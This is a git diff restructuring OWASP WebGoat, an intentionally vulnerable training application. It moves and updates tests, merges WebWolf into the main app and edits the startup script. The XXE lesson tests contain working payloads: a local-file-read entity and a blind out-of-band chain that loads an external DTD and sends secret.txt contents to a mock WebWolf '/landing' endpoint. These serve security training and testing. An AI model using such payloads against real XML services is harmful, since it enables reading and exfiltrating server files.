+import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.get;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-/**
- * @author nbaars
- * @since 5/4/17.
- */
-@ExtendWith(SpringExtension.class)
-public class BlindSendFileAssignmentTest extends LessonTest {
+class BlindSendFileAssignmentTest extends LessonTest {
 
-    @Autowired
-    private XXE xxe;
-    @Autowired
-    private Comments comments;
-    @Value("${webgoat.user.directory}")
-    private String webGoatHomeDirectory;
-    
     private int port;
-
     private WireMockServer webwolfServer;
 
     @BeforeEach
@@ -47,25 +36,38 @@ public class BlindSendFileAssignmentTest extends LessonTest {
         this.webwolfServer = new WireMockServer(options().dynamicPort());
         webwolfServer.start();
         this.port = webwolfServer.port();
-        when(webSession.getCurrentLesson()).thenReturn(xxe);
+        when(webSession.getCurrentLesson()).thenReturn(new XXE());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
+    private int countComments() throws Exception {
+        var response = mockMvc.perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
+                .andExpect(status().isOk())
+                .andReturn();
+        return new ObjectMapper().reader().readTree(response.getResponse().getContentAsString()).size();
+    }
+
+    private void containsComment(String expected) throws Exception {
+        mockMvc.perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
+                .andExpect(status().isOk())
+                .andExpect(jsonPath("$.[*].text").value(Matchers.hasItem(expected)));
+    }
+
     @Test
     public void validCommentMustBeAdded() throws Exception {
-        int nrOfComments = comments.getComments().size();
+        int nrOfComments = countComments();
         mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
-                .content("<comment><text>test</text></comment>"))
+                        .content("<comment><text>test</text></comment>"))
 
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
-        assertThat(comments.getComments().size()).isEqualTo(nrOfComments + 1);
+        assertThat(countComments()).isEqualTo(nrOfComments + 1);
     }
 
     @Test
     public void wrongXmlShouldGiveErrorBack() throws Exception {
         mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
-                .content("<comment><text>test</ext></comment>"))
+                        .content("<comment><text>test</ext></comment>"))
 
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))))
@@ -74,32 +76,32 @@ public class BlindSendFileAssignmentTest extends LessonTest {
 
     @Test
     public void simpleXXEShouldNotWork() throws Exception {
-        File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
+        File targetFile = new File(webGoatHomeDirectory, "/XXE/" + webSession.getUserName() + "/secret.txt");
         String content = "<?xml version=\"1.0\" standalone=\"yes\" ?><!DOCTYPE user [<!ENTITY root SYSTEM \"file:///%s\"> ]><comment><text>&root;</text></comment>";
         mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
-                .content(String.format(content, targetFile.toString())))
+                        .content(String.format(content, targetFile.toString())))
                 .andExpect(status().isOk());
-        assertThat(comments.getComments()).extracting(c -> c.getText()).containsAnyOf("Nice try, you need to send the file to WebWolf");
+        containsComment("Nice try, you need to send the file to WebWolf");
     }
 
     @Test
     public void solve() throws Exception {
-        File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
+        File targetFile = new File(webGoatHomeDirectory, "/XXE/" + webSession.getUserName() + "/secret.txt");
         //Host DTD on WebWolf site
         String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
                 "<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
-                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:"+port+"/landing?text=%file;'>\">\n" +
+                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:" + port + "/landing?text=%file;'>\">\n" +
                 "%all;";
-        webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd"))
+        webwolfServer.stubFor(WireMock.get(WireMock.urlMatching("/files/test.dtd"))
                 .willReturn(aResponse()
                         .withStatus(200)
                         .withBody(dtd)));
-        webwolfServer.stubFor(get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
+        webwolfServer.stubFor(WireMock.get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
 
         //Make the request from WebGoat
         String xml = "<?xml version=\"1.0\"?>" +
                 "<!DOCTYPE comment [" +
-                "<!ENTITY % remote SYSTEM \"http://localhost:"+port+"/files/test.dtd\">" +
+                "<!ENTITY % remote SYSTEM \"http://localhost:" + port + "/files/test.dtd\">" +
                 "%remote;" +
                 "]>" +
                 "<comment><text>test&send;</text></comment>";
@@ -108,21 +110,21 @@ public class BlindSendFileAssignmentTest extends LessonTest {
 
     @Test
     public void solveOnlyParamReferenceEntityInExternalDTD() throws Exception {
-        File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
+        File targetFile = new File(webGoatHomeDirectory, "/XXE/" + webSession.getUserName() + "/secret.txt");
         //Host DTD on WebWolf site
         String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
-                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:"+port+"/landing?text=%file;'>\">\n";
-        webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd"))
+                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:" + port + "/landing?text=%file;'>\">\n";
+        webwolfServer.stubFor(WireMock.get(WireMock.urlMatching("/files/test.dtd"))
                 .willReturn(aResponse()
                         .withStatus(200)
                         .withBody(dtd)));
-        webwolfServer.stubFor(get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
+        webwolfServer.stubFor(WireMock.get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
 
         //Make the request from WebGoat
         String xml = "<?xml version=\"1.0\"?>" +
                 "<!DOCTYPE comment [" +
-                "<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
-                "<!ENTITY % remote SYSTEM \"http://localhost:"+port+"/files/test.dtd\">" +
+                "<!ENTITY % file SYSTEM \"" + targetFile.toURI() + "\">\n" +
+                "<!ENTITY % remote SYSTEM \"http://localhost:" + port + "/files/test.dtd\">" +
                 "%remote;" +
                 "%all;" +
                 "]>" +
@@ -133,7 +135,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
     private void performXXE(String xml) throws Exception {
         //Call with XXE injection
         mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
-                .content(xml))
+                        .content(xml))
 
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
@@ -144,9 +146,9 @@ public class BlindSendFileAssignmentTest extends LessonTest {
 
         //Call with retrieved text
         mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
-                .content("<comment><text>" + text + "</text></comment>"))
+                        .content("<comment><text>" + text + "</text></comment>"))
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.solved"))));
     }
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/xxe/ContentTypeAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignmentTest.java
similarity index 72%
rename from webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/xxe/ContentTypeAssignmentTest.java
rename to src/test/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignmentTest.java
index d5536e230..10d4d75cb 100644
--- a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/xxe/ContentTypeAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignmentTest.java
@@ -20,21 +20,21 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xxe;
+package org.owasp.webgoat.lessons.xxe;
 
+import com.fasterxml.jackson.databind.ObjectMapper;
 import org.hamcrest.CoreMatchers;
+import org.hamcrest.Matchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
-import org.springframework.beans.factory.annotation.Autowired;
+import org.owasp.webgoat.container.plugins.LessonTest;
 import org.springframework.http.MediaType;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.result.MockMvcResultHandlers;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
-import static org.assertj.core.api.Assertions.assertThat;
 import static org.mockito.Mockito.when;
+import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.get;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
@@ -42,17 +42,11 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
  * @author nbaars
  * @since 11/2/17.
  */
-@ExtendWith(SpringExtension.class)
 public class ContentTypeAssignmentTest extends LessonTest {
 
-    @Autowired
-    private XXE xxe;
-    @Autowired
-    private Comments comments;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(xxe);
+        when(webSession.getCurrentLesson()).thenReturn(new XXE());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
@@ -81,17 +75,32 @@ public class ContentTypeAssignmentTest extends LessonTest {
                 .content("{  \"text\" : \"Hello World\"}"))
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("xxe.content.type.feedback.json"))));
-        assertThat(comments.getComments().stream().filter(c -> c.getText().equals("Hello World")).count()).isEqualTo(1);
+
+        mockMvc.perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
+                .andExpect(status().isOk())
+                .andExpect(jsonPath("$.[*].text").value(Matchers.hasItem("Hello World")));
+    }
+
+    private int countComments() throws Exception {
+        var response = mockMvc.perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
+                .andExpect(status().isOk())
+                .andReturn();
+        return new ObjectMapper().reader().readTree(response.getResponse().getContentAsString()).size();
     }
 
     @Test
-    public void postingInvalidJsonShouldAddComment() throws Exception {
+    public void postingInvalidJsonShouldNotAddComment() throws Exception {
+        var numberOfComments = countComments();
         mockMvc.perform(MockMvcRequestBuilders.post("/xxe/content-type")
                 .contentType(MediaType.APPLICATION_JSON)
                 .content("{  'text' : 'Wrong'"))
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("xxe.content.type.feedback.json"))));
-        assertThat(comments.getComments().stream().filter(c -> c.getText().equals("Wrong")).count()).isEqualTo(0);
+
+        mockMvc.perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
+                .andExpect(status().isOk())
+                .andDo(MockMvcResultHandlers.print())
+                .andExpect(jsonPath("$.[*]").value(Matchers.hasSize(numberOfComments)));
     }
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/xxe/SimpleXXETest.java b/src/test/java/org/owasp/webgoat/lessons/xxe/SimpleXXETest.java
similarity index 95%
rename from webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/xxe/SimpleXXETest.java
rename to src/test/java/org/owasp/webgoat/lessons/xxe/SimpleXXETest.java
index 36efb0a0e..7c35ac049 100644
--- a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/xxe/SimpleXXETest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/xxe/SimpleXXETest.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xxe;
+package org.owasp.webgoat.lessons.xxe;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
@@ -43,12 +43,9 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
 @ExtendWith(SpringExtension.class)
 public class SimpleXXETest extends LessonTest {
 
-    @Autowired
-    private XXE xxe;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(xxe);
+        when(webSession.getCurrentLesson()).thenReturn(new XXE());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
@@ -86,4 +83,4 @@ public class SimpleXXETest extends LessonTest {
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
     }
 
-}
\ No newline at end of file
+}
diff --git a/src/test/java/org/owasp/webgoat/webwolf/WebWolfApplication.java b/src/test/java/org/owasp/webgoat/webwolf/WebWolfApplication.java
new file mode 100644
index 000000000..ca7dd55f0
--- /dev/null
+++ b/src/test/java/org/owasp/webgoat/webwolf/WebWolfApplication.java
@@ -0,0 +1,10 @@
+package org.owasp.webgoat.webwolf;
+
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+import org.springframework.context.annotation.PropertySource;
+
+@SpringBootApplication(scanBasePackages = "org.owasp.webgoat.webwolf")
+@PropertySource("classpath:application-webwolf.properties")
+public class WebWolfApplication {
+
+}
diff --git a/webwolf/src/test/java/org/owasp/webwolf/jwt/JWTTokenTest.java b/src/test/java/org/owasp/webgoat/webwolf/jwt/JWTTokenTest.java
similarity index 98%
rename from webwolf/src/test/java/org/owasp/webwolf/jwt/JWTTokenTest.java
rename to src/test/java/org/owasp/webgoat/webwolf/jwt/JWTTokenTest.java
index 7ad511ab3..48a126dfc 100644
--- a/webwolf/src/test/java/org/owasp/webwolf/jwt/JWTTokenTest.java
+++ b/src/test/java/org/owasp/webgoat/webwolf/jwt/JWTTokenTest.java
@@ -1,4 +1,4 @@
-package org.owasp.webwolf.jwt;
+package org.owasp.webgoat.webwolf.jwt;
 
 import com.fasterxml.jackson.databind.ObjectMapper;
 import lombok.SneakyThrows;
@@ -73,4 +73,4 @@ class JWTTokenTest {
         return mapper.writeValueAsString(map);
     }
 
-}
\ No newline at end of file
+}
diff --git a/webwolf/src/test/java/org/owasp/webwolf/mailbox/MailboxControllerTest.java b/src/test/java/org/owasp/webgoat/webwolf/mailbox/MailboxControllerTest.java
similarity index 91%
rename from webwolf/src/test/java/org/owasp/webwolf/mailbox/MailboxControllerTest.java
rename to src/test/java/org/owasp/webgoat/webwolf/mailbox/MailboxControllerTest.java
index a1600b094..6e1135fb6 100644
--- a/webwolf/src/test/java/org/owasp/webwolf/mailbox/MailboxControllerTest.java
+++ b/src/test/java/org/owasp/webgoat/webwolf/mailbox/MailboxControllerTest.java
@@ -20,7 +20,24 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf.mailbox;
+package org.owasp.webgoat.webwolf.mailbox;
+
+import com.fasterxml.jackson.annotation.JsonIgnoreProperties;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.google.common.collect.Lists;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.mockito.Mockito;
+import org.owasp.webgoat.webwolf.user.UserService;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.boot.test.autoconfigure.web.servlet.WebMvcTest;
+import org.springframework.boot.test.mock.mockito.MockBean;
+import org.springframework.http.MediaType;
+import org.springframework.security.test.context.support.WithMockUser;
+import org.springframework.test.web.servlet.MockMvc;
+
+import java.time.LocalDateTime;
+import java.time.format.DateTimeFormatter;
 
 import static org.hamcrest.CoreMatchers.containsString;
 import static org.hamcrest.CoreMatchers.not;
@@ -30,30 +47,7 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.view;
 
-import java.time.LocalDateTime;
-import java.time.format.DateTimeFormatter;
-
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.mockito.Mockito;
-import org.owasp.webwolf.user.UserService;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.boot.test.autoconfigure.web.servlet.WebMvcTest;
-import org.springframework.boot.test.mock.mockito.MockBean;
-import org.springframework.http.MediaType;
-import org.springframework.security.test.context.support.WithMockUser;
-import org.springframework.test.context.ActiveProfiles;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.MockMvc;
-
-import com.fasterxml.jackson.annotation.JsonIgnoreProperties;
-import com.fasterxml.jackson.databind.ObjectMapper;
-import com.google.common.collect.Lists;
-
-@ExtendWith(SpringExtension.class)
 @WebMvcTest(MailboxController.class)
-@ActiveProfiles({"test", "webwolf"})
 public class MailboxControllerTest {
 
     @Autowired
@@ -85,7 +79,7 @@ public class MailboxControllerTest {
                 .time(LocalDateTime.now())
                 .build();
         this.mvc.perform(post("/mail").contentType(MediaType.APPLICATION_JSON).content(objectMapper.writeValueAsBytes(email)))
-                .andExpect(status().isOk());
+                .andExpect(status().isCreated());
     }
 
     @Test
@@ -100,7 +94,7 @@ public class MailboxControllerTest {
                 .build();
         Mockito.when(mailbox.findByRecipientOrderByTimeDesc("test1234")).thenReturn(Lists.newArrayList(email));
 
-        this.mvc.perform(get("/WebWolf/mail"))
+        this.mvc.perform(get("/mail"))
                 .andExpect(status().isOk())
                 .andExpect(view().name("mailbox"))
                 .andExpect(content().string(containsString("Click this mail")))
@@ -119,10 +113,10 @@ public class MailboxControllerTest {
                 .build();
         Mockito.when(mailbox.findByRecipientOrderByTimeDesc("test1234")).thenReturn(Lists.newArrayList(email));
 
-        this.mvc.perform(get("/WebWolf/mail"))
+        this.mvc.perform(get("/mail"))
                 .andExpect(status().isOk())
                 .andExpect(view().name("mailbox"))
                 .andExpect(content().string(not(containsString("Click this mail"))));
     }
 
-}
\ No newline at end of file
+}
diff --git a/webwolf/src/test/java/org/owasp/webwolf/mailbox/MailboxRepositoryTest.java b/src/test/java/org/owasp/webgoat/webwolf/mailbox/MailboxRepositoryTest.java
similarity index 88%
rename from webwolf/src/test/java/org/owasp/webwolf/mailbox/MailboxRepositoryTest.java
rename to src/test/java/org/owasp/webgoat/webwolf/mailbox/MailboxRepositoryTest.java
index 3a32dbb44..6e293779b 100644
--- a/webwolf/src/test/java/org/owasp/webwolf/mailbox/MailboxRepositoryTest.java
+++ b/src/test/java/org/owasp/webgoat/webwolf/mailbox/MailboxRepositoryTest.java
@@ -20,29 +20,25 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf.mailbox;
+package org.owasp.webgoat.webwolf.mailbox;
 
-import static org.junit.jupiter.api.Assertions.assertEquals;
+import org.junit.jupiter.api.Test;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.boot.test.autoconfigure.orm.jpa.DataJpaTest;
 
 import java.time.LocalDateTime;
 import java.util.List;
 
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.boot.test.autoconfigure.orm.jpa.DataJpaTest;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
+import static org.junit.jupiter.api.Assertions.assertEquals;
 
 @DataJpaTest
-@ExtendWith(SpringExtension.class)
 public class MailboxRepositoryTest {
 
-
     @Autowired
     private MailboxRepository mailboxRepository;
 
     @Test
-    public void emailShouldBeSaved() {
+    void emailShouldBeSaved() {
         Email email = new Email();
         email.setTime(LocalDateTime.now());
         email.setTitle("test");
@@ -53,7 +49,7 @@ public class MailboxRepositoryTest {
     }
 
     @Test
-    public void savedEmailShouldBeFoundByReceipient() {
+    void savedEmailShouldBeFoundByReceipient() {
         Email email = new Email();
         email.setTime(LocalDateTime.now());
         email.setTitle("test");
diff --git a/webwolf/src/test/java/org/owasp/webwolf/user/UserServiceTest.java b/src/test/java/org/owasp/webgoat/webwolf/user/UserServiceTest.java
similarity index 98%
rename from webwolf/src/test/java/org/owasp/webwolf/user/UserServiceTest.java
rename to src/test/java/org/owasp/webgoat/webwolf/user/UserServiceTest.java
index 3e7b65458..a9049f482 100644
--- a/webwolf/src/test/java/org/owasp/webwolf/user/UserServiceTest.java
+++ b/src/test/java/org/owasp/webgoat/webwolf/user/UserServiceTest.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf.user;
+package org.owasp.webgoat.webwolf.user;
 
 import static org.junit.jupiter.api.Assertions.assertThrows;
 import static org.mockito.ArgumentMatchers.any;
diff --git a/src/test/resources/application-webgoat-test.properties b/src/test/resources/application-webgoat-test.properties
new file mode 100644
index 000000000..9bfc7eea6
--- /dev/null
+++ b/src/test/resources/application-webgoat-test.properties
@@ -0,0 +1,8 @@
+webgoat.user.directory=${java.io.tmpdir}
+
+spring.datasource.url=jdbc:hsqldb:mem:test
+spring.flyway.locations=classpath:/db/container
+spring.main.banner-mode=off
+spring.jpa.properties.hibernate.default_schema=CONTAINER
+
+spring.datasource.driver-class-name=org.hsqldb.jdbc.JDBCDriver
diff --git a/webgoat-container/src/test/resources/application-test.properties b/src/test/resources/application-webwolf.properties
similarity index 58%
rename from webgoat-container/src/test/resources/application-test.properties
rename to src/test/resources/application-webwolf.properties
index 56951876b..025019b11 100644
--- a/webgoat-container/src/test/resources/application-test.properties
+++ b/src/test/resources/application-webwolf.properties
@@ -1,6 +1,9 @@
 webgoat.user.directory=${java.io.tmpdir}
 
 spring.datasource.url=jdbc:hsqldb:mem:test
-webgoat.start.hsqldb=false
 spring.flyway.locations=classpath:/db/container
 spring.main.banner-mode=off
+spring.jpa.properties.hibernate.default_schema=CONTAINER
+spring.thymeleaf.prefix=classpath:/webwolf/templates/
+
+
diff --git a/webgoat-container/src/test/resources/logback-test.xml b/src/test/resources/logback-test.xml
similarity index 100%
rename from webgoat-container/src/test/resources/logback-test.xml
rename to src/test/resources/logback-test.xml
diff --git a/docker/start.sh b/start.sh
similarity index 63%
rename from docker/start.sh
rename to start.sh
index a4912e120..89fad85b2 100755
--- a/docker/start.sh
+++ b/start.sh
@@ -2,22 +2,6 @@
 
 cd /home/webgoat 
 
-function should_start_nginx() {
-  if [[ -v "${SKIP_NGINX}" ]]; then
-    return 1
-  else
-    for i in "${commandline_args[@]}" ; do [[ $i == "skip-nginx" ]] && return 1 ; done
-  fi
-  return 0
-}
-
-function nginx() {
-  if should_start_nginx; then
-    echo "Starting nginx..."
-    service nginx start
-  fi
-}
-
 function webgoat() {
   echo "Starting WebGoat...."
   java \
@@ -31,12 +15,9 @@ function webgoat() {
    --add-opens java.desktop/java.awt.font=ALL-UNNAMED \
    --add-opens java.base/sun.nio.ch=ALL-UNNAMED \
    --add-opens java.base/java.io=ALL-UNNAMED \
-   -jar webgoat.jar --server.address=0.0.0.0 > webgoat.log
-}
-
-function webwolf() {
-  echo "Starting WebWolf..."
-  java -Duser.home=/home/webgoat -Dfile.encoding=UTF-8 -jar webwolf.jar --server.address=0.0.0.0 > webwolf.log
+   --add-opens java.base/java.util=ALL-UNNAMED \
+   -Dwebgoat.host=0.0.0.0 -Dwebwolf.host=0.0.0.0 -Dwebgoat.port=8080 -Dwebwolf.port=9090 \
+   -jar webgoat.jar > webgoat.log
 }
 
 function write_start_message() {
@@ -51,9 +32,9 @@ function write_start_message() {
        \  /\  /  |  __/ | |_) | | |__| | | (_) | | (_| | | |_
         \/  \/    \___| |_.__/   \_____|  \___/   \__,_|  \__|
   " >> webgoat.log
-  echo $'WebGoat and WebWolf successfully started...\n' >> webgoat.log
+  echo $'WebGoat successfully started...\n' >> webgoat.log
   echo "NOTE: port numbers mentioned below may vary depending on your port mappings while starting the Docker container" >> webgoat.log
-  pidof nginx >/dev/null && echo "Browse to http://localhost to get started" >> webgoat.log || echo "Browse to http://localhost:8080/WebGoat or http://localhost:9090/WebWolf to get started." >> webgoat.log
+  echo "Browse to http://localhost:8080/WebGoat to get started." >> webgoat.log
 }
 
 function tail_log_file() {
@@ -63,9 +44,7 @@ function tail_log_file() {
 
 commandline_args=("$@")
 
-nginx
 webgoat &
-webwolf &
 write_start_message &
 tail_log_file
 
diff --git a/webgoat-container/.gitignore b/webgoat-container/.gitignore
deleted file mode 100644
index 6503556df..000000000
--- a/webgoat-container/.gitignore
+++ /dev/null
@@ -1,8 +0,0 @@
-target/
-.idea/
-*.iml
-/src/main/webapp/plugin_lessons/*.jar
-/src/main/webapp/plugin_extracted/*
-dependency-reduced-pom.xml
-src/main/webapp/users/guest.org.owasp.webgoat.lessons.BackDoors.props
-/src/main/webapp/WEB-INF/lib/*.jar
\ No newline at end of file
diff --git a/webgoat-container/pom.xml b/webgoat-container/pom.xml
deleted file mode 100644
index 35e4645bd..000000000
--- a/webgoat-container/pom.xml
+++ /dev/null
@@ -1,111 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <name>webgoat-container</name>
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>webgoat-container</artifactId>
-    <packaging>jar</packaging>
-
-    <parent>
-        <groupId>org.owasp.webgoat</groupId>
-        <artifactId>webgoat-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <build>
-        <plugins>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-surefire-plugin</artifactId>
-                <version>${maven-surefire-plugin.version}</version>
-            </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-jar-plugin</artifactId>
-                <executions>
-                    <execution>
-                        <goals>
-                            <goal>test-jar</goal>
-                        </goals>
-                    </execution>
-                </executions>
-            </plugin>
-        </plugins>
-    </build>
-
-    <dependencies>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-undertow</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-web</artifactId>
-            <exclusions>
-                <exclusion>
-                    <groupId>org.springframework.boot</groupId>
-                    <artifactId>spring-boot-starter-tomcat</artifactId>
-                </exclusion>
-            </exclusions>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-actuator</artifactId>
-           <exclusions>
-                <exclusion>
-                    <groupId>org.apache.logging.log4j</groupId>
-                    <artifactId>log4j-api</artifactId>
-                </exclusion>
-                <exclusion>
-                    <groupId>org.apache.logging.log4j</groupId>
-                    <artifactId>log4j-to-slf4j</artifactId>
-                </exclusion>
-            </exclusions>
-        </dependency>
-        <dependency>
-            <groupId>org.flywaydb</groupId>
-            <artifactId>flyway-core</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.asciidoctor</groupId>
-            <artifactId>asciidoctorj</artifactId>
-            <version>${asciidoctorj.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-data-jpa</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.apache.commons</groupId>
-            <artifactId>commons-lang3</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-security</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-thymeleaf</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.thymeleaf.extras</groupId>
-            <artifactId>thymeleaf-extras-springsecurity5</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.hsqldb</groupId>
-            <artifactId>hsqldb</artifactId>
-        </dependency>
-
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.security</groupId>
-            <artifactId>spring-security-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-    </dependencies>
-</project>
-
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/DatabaseConfiguration.java b/webgoat-container/src/main/java/org/owasp/webgoat/DatabaseConfiguration.java
deleted file mode 100644
index cf8e04c2f..000000000
--- a/webgoat-container/src/main/java/org/owasp/webgoat/DatabaseConfiguration.java
+++ /dev/null
@@ -1,56 +0,0 @@
-package org.owasp.webgoat;
-
-import org.flywaydb.core.Flyway;
-import org.flywaydb.core.api.configuration.FluentConfiguration;
-import org.owasp.webgoat.service.RestartLessonService;
-import org.springframework.beans.factory.annotation.Value;
-import org.springframework.context.annotation.Bean;
-import org.springframework.context.annotation.Configuration;
-
-import javax.sql.DataSource;
-import java.util.Map;
-import java.util.function.Consumer;
-import java.util.function.Function;
-import java.util.function.Supplier;
-
-@Configuration
-public class DatabaseConfiguration {
-
-    private String driverClassName;
-
-    public DatabaseConfiguration(@Value("${spring.datasource.driver-class-name}") String driverClassName) {
-        this.driverClassName = driverClassName;
-    }
-
-    /**
-     * Define 2 Flyway instances, 1 for WebGoat itself which it uses for internal storage like users and 1 for lesson
